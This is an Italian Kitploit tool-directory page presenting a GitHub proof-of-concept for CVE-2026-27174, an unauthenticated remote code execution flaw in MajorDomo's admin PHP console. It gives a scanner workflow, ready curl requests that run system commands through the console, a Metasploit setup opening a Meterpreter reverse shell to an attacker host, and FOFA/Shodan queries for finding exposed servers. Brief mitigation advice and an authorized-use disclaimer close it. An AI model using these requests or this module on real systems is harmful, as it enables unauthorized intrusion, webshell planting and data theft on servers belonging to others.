Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
majordomo-CVE-2026-27174-poc — CVE-2026-27174 - Esecuzione remota di codice non autenticata tramite la funzionalità console PHP del pannello di amministrazione. | Kitploit
Strumenti/GitHubGitHub/maxmnml/majordomo-cve-2026-27174-poc
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubmaxmnml/majordomo-cve-2026-27174-poc

majordomo-CVE-2026-27174-poc

CVE-2026-27174 - Esecuzione remota di codice non autenticata tramite la funzionalità console PHP del pannello di amministrazione.

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
5 mesi faNon ancora revisionato

majordomo-CVE-2026-27174-poc

Una proof-of-concept che sfrutta l'esecuzione remota di codice non autenticata tramite la funzione console PHP del pannello di amministrazione in MajorDomo (Major Domestic Module).

Vulnerabilità

Il pannello di amministrazione di MajorDoMo espone una console di valutazione PHP tramite /admin.php. A causa di una exit mancante dopo un reindirizzamento di autenticazione in panel.class.php, l'handler AJAX inc_panel_ajax.php viene incluso incondizionatamente, rendendo la sua eval() raggiungibile da qualsiasi richiesta HTTP non autenticata.

Un attaccante può eseguire codice PHP arbitrario con una singola richiesta GET, senza richiedere credenziali, accesso preliminare o interazione da parte della vittima.

Versioni interessate

  • Tutte le versioni di MajorDomo precedenti alla patch del 18 febbraio 2026.

Scanner di rilevamento

scan.py è uno scanner multi-thread non distruttivo che rileva gli host vulnerabili a CVE-2026-27174 senza eseguire alcun payload dannoso.

Come funziona

Lo scanner opera in tre fasi sequenziali per ogni target:

root@kitploit:~
Phase 1 — RCE Confirmation
  └─ Sends: echo 'random_marker';
  └─ Checks: marker is reflected in the response body
  └─ Confirms: eval() is reachable without authentication

Phase 2 — PHP Sandbox Profiling
  └─ Sends: echo 'marker:' . ini_get('disable_functions');
  └─ Extracts: list of disabled PHP functions on the server

Phase 3 — OS Execution Surface
  └─ Probes: system, exec, shell_exec, passthru via function_exists()
  └─ Classifies: impact level as HIGH or MEDIUM

Un marcatore alfanumerico casuale viene generato per ogni richiesta per evitare falsi positivi dovuti a caching, WAF o inquinamento delle risposte.

Utilizzo

Requisiti

root@kitploit:~
pip install requests

1. Preparare un file di target

Creare un file targets.txt con un IP:PORT per riga:

root@kitploit:~
192.168.1.10:8080
10.0.0.5:80
10.0.0.12:443
# lines starting with # are ignored
# only IP:PORT format is accepted

2. Eseguire lo scanner

root@kitploit:~
python3 scan.py targets.txt

Output

root@kitploit:~
[+] RCE PHP CONFIRMED -> http://192.168.1.10:8080/admin.php
[-] Not vulnerable -> 10.0.0.5:80

[+] Vulnerable targets exported to results.json

results.json

Generato automaticamente quando viene trovato almeno un host vulnerabile:

root@kitploit:~
[
    {
        "target": "192.168.1.10:8080",
        "url": "http://192.168.1.10:8080/admin.php",
        "rce_php": true,
        "disable_functions": "popen,pclose,proc_open",
        "system_functions_available": ["system", "exec"],
        "impact_level": "HIGH"
    }
]

Sfruttamento

In base al risultato del campo system_functions_available nel file result.json, possiamo costruire una richiesta GET usando la/le funzione/i di sistema per sfruttare l'RCE:

root@kitploit:~
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+exec('id');
#or
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+system('id');

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Automazione

Modulo Metasploit:

root@kitploit:~
msfconsole
use exploit/multi/http/majordomo_console_eval_rce
set RHOSTS 192.168.1.10
set RPORT 8080
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 172.17.0.1
check #Verify it returns Vulnerable
run #Verify a Meterpreter session opens as www-data

Nel mondo reale

FOFA:

root@kitploit:~
title="MajorDomoSL"

SHODAN:

root@kitploit:~
http.title:"MajorDomoSL"

Impatto

Un attaccante remoto non autenticato può:

  • Eseguire codice PHP arbitrario sul server
  • Leggere file sensibili (/etc/passwd, file di configurazione, credenziali)
  • Scrivere webshell PHP per accesso persistente
  • Passare all'esecuzione di comandi a livello OS se le funzioni PHP system, exec, shell_exec o passthru non sono disabilitate

L'impatto effettivo dipende dalla configurazione PHP disable_functions del server:

CVSS 4.0 - 9.3 CRITICAL — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS 3.1 - 9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Rimedi e Mitigazioni

Aggiornare all'ultima versione di MajorDomo (Major Domestic Module).

ControlloPreviene l'RCEPreviene l'exec OS

Riferimenti

https://chocapikk.com/posts/2026/majordomo-revisited

https://nvd.nist.gov/vuln/detail/CVE-2026-27174

https://github.com/sergejey/majordomo/pull/1177

Avvertenza

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale.

Scarica lo strumento
CampoDescrizione
targetIP:PORT scansionato
urlURL completo in cui è stato confermato l'RCE
rce_phpEsecuzione di codice PHP confermata (sempre true nei risultati)
disable_functionsImpostazione PHP disable_functions del server (null se vuota)
system_functions_availableFunzioni di esecuzione OS richiamabili da un attaccante
impact_levelHIGH (esecuzione OS raggiungibile) o MEDIUM (solo RCE PHP)
ScenarioLivello di impattoDescrizione
Nessun disable_functionsCRITICALEsecuzione completa di comandi OS
Restrizioni parzialiHIGHRCE PHP + esecuzione OS parziale
disable_functions blocca ogni execMEDIUMSolo RCE PHP (lettura/scrittura file, esfiltrazione dati)
Applica la patch del 18 febbraio 2026✅✅
Firewall/allowlist IP su /admin.php✅✅
Hardening di disable_functions❌✅